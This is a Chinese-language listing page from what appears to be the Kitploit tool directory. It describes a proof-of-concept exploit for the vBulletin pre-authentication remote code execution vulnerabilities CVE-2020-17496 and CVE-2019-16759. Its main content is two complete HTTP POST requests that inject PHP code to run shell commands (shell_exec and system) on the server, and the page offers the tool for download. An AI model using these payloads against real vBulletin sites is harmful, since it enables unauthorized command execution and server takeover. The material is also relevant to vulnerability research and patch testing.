Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2020-17496 — vBulletin 预认证远程代码执行漏洞(CVE-2020-17496, CVE-2019-16759)的概念验证利用,通过组件 PHP 模板注入实现。 | Kitploit
工具/GitHubGitHub/ctlyz123/cve-2020-17496
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制
GitHubctlyz123/cve-2020-17496

CVE-2020-17496

vBulletin 预认证远程代码执行漏洞(CVE-2020-17496, CVE-2019-16759)的概念验证利用,通过组件 PHP 模板注入实现。

查看仓库
13256年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2020-17496

root@kitploit:~
POST /ajax/render/widget_tabbedcontainer_tab_panel?XDEBUG_SESSION_START=phpstorm HTTP/1.1
Host: localhost
User-Agent: curl/7.54.0
Accept: */*
Content-Length: 100
Content-Type: application/x-www-form-urlencoded

subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec("pwd"); exit;

CVE-2019-16759

root@kitploit:~
POST /index.php HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 71
Connection: close

routestring=ajax/render/widget_php&widgetConfig[code]=system('whoami');
下载工具